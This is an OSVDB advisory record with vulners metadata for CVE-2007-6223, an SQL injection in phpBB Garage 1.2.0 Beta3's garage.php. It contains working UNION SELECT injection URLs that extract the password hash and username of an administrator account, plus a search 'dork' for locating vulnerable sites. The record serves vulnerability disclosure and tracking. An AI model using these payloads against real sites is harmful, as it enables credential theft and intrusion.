ID OSVDB:39696
Type osvdb
Reporter OSVDB
Modified 2007-12-03T00:00:00
Description
Manual Testing Notes
garage.php?mode=browse&search=yes&make_id=-1//union//select//1,2/*
garage.php?mode=browse&search=yes&make_id=-1//union//select//concat(user_password,char(94),username),2//from//phpbb_users//where//user_id=2/*
References:
Vendor URL: http://phpbbgarage.com
ISS X-Force ID: 38832
Generic Exploit URL: http://www.milw0rm.com/exploits/4686
CVE-2007-6223
Bugtraq ID: 26683
{"href": "https://vulners.com/osvdb/OSVDB:39696", "history": [], "id": "OSVDB:39696", "reporter": "OSVDB", "published": "2007-12-03T00:00:00", "description": "## Manual Testing Notes\ngarage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/*\ngarage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/*\n## References:\nVendor URL: http://phpbbgarage.com\nISS X-Force ID: 38832\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4686\n[CVE-2007-6223](https://vulners.com/cve/CVE-2007-6223)\nBugtraq ID: 26683\n", "title": "phpBB Garage garage.php search Action make_id Variable SQL Injection", "lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "hash": "2c058c93f9be0e2ecc9a4b418913cb48b4b37034e921ff6e0c277f5a66b94f7c", "references": [], "edition": 1, "cvelist": ["CVE-2007-6223"], "affectedSoftware": [], "viewCount": 4, "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2017-04-28T13:20:35"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-6223"]}, {"type": "exploitdb", "idList": ["EDB-ID:4686"]}], "modified": "2017-04-28T13:20:35"}, "vulnersScore": 6.9}, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "70dd3f182d4a3b787537a11b5825f9f5"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "7ef55c6e63c258bf471befff58be2a86"}, {"key": "href", "hash": "7dac356165b3ac6688be0ea4d462b3ba"}, {"key": "modified", "hash": "ebef0da5733dce975a1369dd478bcf6e"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "ebef0da5733dce975a1369dd478bcf6e"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "5518e7276ab2de1dfaab249aa35df74d"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "objectVersion": "1.2", "modified": "2007-12-03T00:00:00"}
{"cve": [{"lastseen": "2019-05-29T18:09:02", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in garage.php in phpBB Garage 1.2.0 Beta3 allows remote attackers to execute arbitrary SQL commands via the make_id parameter in a search action in browse mode.", "modified": "2017-09-29T01:29:00", "id": "CVE-2007-6223", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-6223", "published": "2007-12-04T17:46:00", "title": "CVE-2007-6223", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-01-31T21:31:38", "bulletinFamily": "exploit", "description": "phpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability. CVE-2007-6223. Webapps exploit for php platform", "modified": "2007-12-03T00:00:00", "published": "2007-12-03T00:00:00", "id": "EDB-ID:4686", "href": "https://www.exploit-db.com/exploits/4686/", "type": "exploitdb", "title": "phpBB Garage 1.2.0 Beta3 - Remote SQL Injection Vulnerability", "sourceData": "Title: phpBB Garage v1.2.0 - Beta3 Remote SQL Injection Vulnerability\nDork: \"Powered By phpBB Garage 1.2.0\"\n\nAuthor: maku234\nE-Mail: maku234@gmail.com\n\n\n\ngarage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/*\ngarage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/*\n\n# milw0rm.com [2007-12-03]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4686/"}]}